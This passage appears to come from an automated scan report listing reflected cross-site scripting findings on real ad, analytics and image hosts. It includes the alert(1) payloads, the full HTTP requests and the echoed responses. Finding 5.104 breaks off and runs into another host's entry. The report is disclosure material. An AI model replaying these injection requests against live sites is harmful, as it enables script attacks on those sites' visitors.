This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/h6381_4008eb52<img%20src%3da%20onerror%3dalert(1)>e396f72724a?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 84
Expires: Mon, 16 May 2011 01:37:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:00 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/h6381_4008eb52<img src=a onerror=alert(1)>e396f72724a

5.100. http://s7d5.scene7.com/is/image/bluestembrands/j7804_400 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/j7804_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c5b08<img%20src%3da%20onerror%3dalert(1)>267c3cd35af was submitted in the REST URL parameter 4. This input was echoed as c5b08<img src=a onerror=alert(1)>267c3cd35af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/j7804_400c5b08<img%20src%3da%20onerror%3dalert(1)>267c3cd35af?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 84
Expires: Mon, 16 May 2011 01:36:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:59 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/j7804_400c5b08<img src=a onerror=alert(1)>267c3cd35af

5.101. http://s7d5.scene7.com/is/image/bluestembrands/n4728_400 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/n4728_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c9dce<img%20src%3da%20onerror%3dalert(1)>898fe953f5b was submitted in the REST URL parameter 4. This input was echoed as c9dce<img src=a onerror=alert(1)>898fe953f5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/n4728_400c9dce<img%20src%3da%20onerror%3dalert(1)>898fe953f5b?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 84
Expires: Mon, 16 May 2011 01:36:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:58 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/n4728_400c9dce<img src=a onerror=alert(1)>898fe953f5b

5.102. http://sales.liveperson.net/hc/71737897/ [msessionkey parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/71737897/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload cebc0<img%20src%3da%20onerror%3dalert(1)>11076a3a308 was submitted in the msessionkey parameter. This input was echoed as cebc0<img src=a onerror=alert(1)>11076a3a308 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/71737897/?&visitor=16601155425835&msessionkey=1547318312735205030cebc0<img%20src%3da%20onerror%3dalert(1)>11076a3a308&siteContainer=STANDALONE&site=71737897&cmd=mTagKnockPage&lpCallId=152897602799-290051536113&protV=20&lpjson=1&id=9784109386&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sonystyle-sales-computer-english%7ClpMTagConfig.db1%7ClpButton-DIV%7C%23chat-sonystyle-service-english%7ClpMTagConfig.db1%7ClpButton-DIV-service%7C%23chat-sonystyle-sales-cart-english%7ClpMTagConfig.db1%7ClpButton-DIV-checkout%7C HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=8198552921644780502
Cookie: HumanClickKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; LivePersonID=LP i=16601155425835,d=1302186497

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:21:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=1547318312735205030cebc0<img src=a onerror=alert(1)>11076a3a308; path=/hc/71737897
Set-Cookie: HumanClickKEY=1547318312735205030cebc0<img src=a onerror=alert(1)>11076a3a308; path=/hc/71737897
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 15 May 2011 21:21:46 GMT
Set-Cookie: HumanClickSiteContainerID_71737897=STANDALONE; path=/hc/71737897
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 31409

lpConnLib.Process({"ResultSet": {"lpCallId":"152897602799-290051536113","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='71737897-VID'; lpMTagConfig.FPC_VID='16601155425835'; lpMTagConfig.FPC_SKEY_NAME='71737897-SKEY'; lpMTagConfig.FPC_SKEY='1547318312735205030cebc0<img src=a onerror=alert(1)>11076a3a308';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_71737897'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...

5.103. http://serv.adspeed.com/ad.php [ht parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://serv.adspeed.com
Path:	/ad.php

Issue detail

The value of the ht request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7be3d"><script>alert(1)</script>0c2f8c115a9 was submitted in the ht parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad.php?do=html&zid=3253&wd=468&ht=607be3d"><script>alert(1)</script>0c2f8c115a9&tz=5&ck=Y&jv=Y&scr=1920x1200x32&ref=&r=0.5050509925931692 HTTP/1.1
Host: serv.adspeed.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://serv.adspeed.com/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID"
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Mon, 16 May 2011 01:20:56 GMT
Server: AdSpeed/s3
Content-Length: 400

<html><head><title>Ad Serving Error Message</title></head><body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 style="background-color:transparent"><a href="http://www.adspeed.com/Knowledges/qu
...[SNIP]...
<img style="border:0px;" src="http://serv.adspeed.com/ad.php?do=error&type=-1&wd=468&ht=607be3d"><script>alert(1)</script>0c2f8c115a9" alt="i" />
...[SNIP]...

5.104. http://serv.adspeed.com/ad.php [wd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://serv.adspeed.com
Path:	/ad.php

Summary

Severity:	High
Confidence:	Certain
Host:	http://sony.links.channelintelligence.com
Path:	/pages/prices.asp

Issue detail

The value of the ssku request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c34c9"%3balert(1)//59b4d9d7a55 was submitted in the ssku parameter. This input was echoed as c34c9";alert(1)//59b4d9d7a55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /pages/prices.asp?nrgid=1864&ssku=98285c34c9"%3balert(1)//59b4d9d7a55 HTTP/1.1
Host: sony.links.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: serverstamp=4B88CCEA-94CF-AEFC-64AD-028BB2019E0D

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 13478
Cache-Control: public, max-age=3600
Expires: Sun, 15 May 2011 21:26:50 GMT
Date: Sun, 15 May 2011 20:26:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com
...[SNIP]...
{}
function Window_onResize(){}
function ShowMailForm(rnSCID,rnCTID,rnLocID){
var sUrl=gsOUrl+'/mailform.asp?cii_nSCID='+rnSCID+'&cii_nCTID='+rnCTID+"&cii_sZip=&cii_nIID=-1&cii_sSKU="+escape("98285c34c9";alert(1)//59b4d9d7a55").replace("+","%2B")+"&cii_nVID=&cii_nLocID="+rnLocID+"&cii_nRGID=1864&cii_nPGID=0&cii_nRadius=15";
document.location=sUrl;
}
function cii_ShowLocations(rnSCID,rnCTID,rnVID,rnLocID,rnStoreID,rnVSt
...[SNIP]...

5.109. http://sony.tt.omtrdc.net/m2/sony/mbox/ajax [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sony.tt.omtrdc.net
Path:	/m2/sony/mbox/ajax

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 649db<script>alert(1)</script>2be9bd4e51a was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/sony/mbox/ajax?mboxHost=www.sonystyle.com&mboxSession=1305494389047-605069&mboxPage=1305494396673-786615&screenHeight=1200&screenWidth=1920&browserWidth=1137&browserHeight=765&browserTimeOffset=-300&colorDepth=24&mboxXDomain=enabled&mboxCount=1&mbox=emptyMbox649db<script>alert(1)</script>2be9bd4e51a&mboxId=0&mboxTime=1305476396673&vmt=48FB612B&ppu=TC1&ce=ISO-8859-1&pageName=Sony%20Store&cc=USD&h1=Sony%20Store&c3=StoreCatalogDisplay&c6=Sony%20Store_&c27=Sony%20Store%20-%20Control&v23=United%20States%20English&v27=Sony%20Store%20-%20Control&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=765&mboxURL=http%3A%2F%2Fwww.sonystyle.com%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FStoreCatalogDisplay%3FlangId%3D-1%26storeId%3D10151%26catalogId%3D10551&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: sony.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551

Response

HTTP/1.1 200 OK
Content-Type: text/JavaScript
Content-Length: 308
Date: Sun, 15 May 2011 21:21:23 GMT
Server: Test & Target

mboxFactories.get('default').get('emptyMbox649db<script>alert(1)</script>2be9bd4e51a',0).cancelTimeout();mboxFactories.get('default').get('emptyMbox649db<script>alert(1)</script>2be9bd4e51a',0).setOff
...[SNIP]...

5.110. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sonycomputerentertai.tt.omtrdc.net
Path:	/m2/sonycomputerentertai/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload b7073<script>alert(1)</script>6a1a3f5c872 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/sonycomputerentertai/mbox/standard?mboxHost=us.playstation.com&mboxSession=1305491190457-245340&mboxPage=1305491192268-399662&screenHeight=1200&screenWidth=1920&browserWidth=1136&browserHeight=902&browserTimeOffset=-300&colorDepth=32&mboxCount=2&mbox=mbox_psnb7073<script>alert(1)</script>6a1a3f5c872&mboxId=0&mboxTime=1305473207208&mboxURL=http%3A%2F%2Fus.playstation.com%2Fpsn%2F&mboxReferrer=&mboxVersion=39 HTTP/1.1
Host: sonycomputerentertai.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/psn/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 204
Date: Sun, 15 May 2011 20:27:35 GMT
Server: Test & Target

mboxFactories.get('default').get('mbox_psnb7073<script>alert(1)</script>6a1a3f5c872',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1305491190457-245340.17");

5.111. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sonycomputerentertai.tt.omtrdc.net
Path:	/m2/sonycomputerentertai/sc/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload f5393<img%20src%3da%20onerror%3dalert(1)>cf7112fc6c7 was submitted in the mbox parameter. This input was echoed as f5393<img src=a onerror=alert(1)>cf7112fc6c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /m2/sonycomputerentertai/sc/standard?mboxHost=us.playstation.com&mboxSession=1305491190457-245340&mboxPage=1305491190457-245340&screenHeight=1200&screenWidth=1920&browserWidth=1136&browserHeight=902&browserTimeOffset=-300&colorDepth=32&mboxCount=1&mbox=SiteCatalyst%3A%20eventf5393<img%20src%3da%20onerror%3dalert(1)>cf7112fc6c7&mboxId=0&mboxTime=1305473203602&visitorNamespace=sonycomputerentertainmentofamerica&pageName=PS&currencyCode=USD&events=prodView%2Cevent2&products=%3B&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx%2Cflv%2Cswf&linkInternalFilters=javascript%3A%2Cus.playstation.com&linkTrackVars=None&linkTrackEvents=None&hier1=PS&eVar2=PS&prop11=1%3A00PM&eVar11=1%3A00PM&prop12=Sunday&eVar12=Sunday&prop13=Weekend&eVar13=Weekend&eVar17=PS&prop21=Logged%20Out&eVar21=Logged%20Out&prop22=New&eVar22=New&prop30=http%3A%2F%2Fus.playstation.com%2F&eVar30=http%3A%2F%2Fus.playstation.com%2F&prop47=PS&mboxURL=http%3A%2F%2Fus.playstation.com%2F&mboxReferrer=&mboxVersion=39&scPluginVersion=1 HTTP/1.1
Host: sonycomputerentertai.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 264
Date: Sun, 15 May 2011 20:28:46 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1305491190457-245340.17");mboxFactories.get('default').get('SiteCatalyst: eventf5393<img src=a onerror=alert(1)>cf7112fc6c7', 0).setOffer(new mboxOfferDefault()).loaded();}

5.112. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard [mboxId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sonycomputerentertai.tt.omtrdc.net
Path:	/m2/sonycomputerentertai/sc/standard

Issue detail

The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload 4483c<script>alert(1)</script>33d87b448fc was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/sonycomputerentertai/sc/standard?mboxHost=us.playstation.com&mboxSession=1305491190457-245340&mboxPage=1305491190457-245340&screenHeight=1200&screenWidth=1920&browserWidth=1136&browserHeight=902&browserTimeOffset=-300&colorDepth=32&mboxCount=1&mbox=SiteCatalyst%3A%20event&mboxId=04483c<script>alert(1)</script>33d87b448fc&mboxTime=1305473203602&visitorNamespace=sonycomputerentertainmentofamerica&pageName=PS&currencyCode=USD&events=prodView%2Cevent2&products=%3B&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx%2Cflv%2Cswf&linkInternalFilters=javascript%3A%2Cus.playstation.com&linkTrackVars=None&linkTrackEvents=None&hier1=PS&eVar2=PS&prop11=1%3A00PM&eVar11=1%3A00PM&prop12=Sunday&eVar12=Sunday&prop13=Weekend&eVar13=Weekend&eVar17=PS&prop21=Logged%20Out&eVar21=Logged%20Out&prop22=New&eVar22=New&prop30=http%3A%2F%2Fus.playstation.com%2F&eVar30=http%3A%2F%2Fus.playstation.com%2F&prop47=PS&mboxURL=http%3A%2F%2Fus.playstation.com%2F&mboxReferrer=&mboxVersion=39&scPluginVersion=1 HTTP/1.1
Host: sonycomputerentertai.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 261
Date: Sun, 15 May 2011 20:28:48 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1305491190457-245340.17");mboxFactories.get('default').get('SiteCatalyst: event', 04483c<script>alert(1)</script>33d87b448fc).setOffer(new mboxOfferDefault()).loaded();}

5.113. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b554"%3balert(1)//30a094dd635 was submitted in the action parameter. This input was echoed as 2b554";alert(1)//30a094dd635 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD2b554"%3balert(1)//30a094dd635&cwrun=200&cwadformat=728X90&cwpid=526735&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=81610 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB24
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5831
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 16 May 2011 01:19:53 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="526735";var ct="81610";var cf="728X90";var ca="VIEWAD2b554";alert(1)//30a094dd635";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var
...[SNIP]...

5.114. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30707"%3balert(1)//ccec8b5486e was submitted in the cwadformat parameter. This input was echoed as 30707";alert(1)//ccec8b5486e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X9030707"%3balert(1)//ccec8b5486e&cwpid=526735&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=81610 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB25
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5831
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 16 May 2011 01:20:07 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="526735";var ct="81610";var cf="728X9030707";alert(1)//ccec8b5486e";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _
...[SNIP]...

5.115. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f535a"%3balert(1)//aa87427b8a9 was submitted in the cwheight parameter. This input was echoed as f535a";alert(1)//aa87427b8a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=523987&cwwidth=728&cwheight=90f535a"%3balert(1)//aa87427b8a9&cwpnet=1&cwtagid=75238 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=2532%3B06%2F14%2F2011%3BAMQU1; V=8vciuQJMXXJY; pb_rtb_ev=1:531292.AG-00000001389358554.0; C2W4=3EtJ7FDeWFTzZJDT0WzXPE0M3LUNpfc5osYrUGLfF5OzhXGVekceXQQ; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB25
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5831
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 16 May 2011 01:22:16 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="523987";var ct="75238";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90f535a";alert(1)//aa87427b8a9";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var
...[SNIP]...

5.116. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f824"%3balert(1)//5d114f1e2c3 was submitted in the cwpid parameter. This input was echoed as 7f824";alert(1)//5d114f1e2c3 in the application's response.

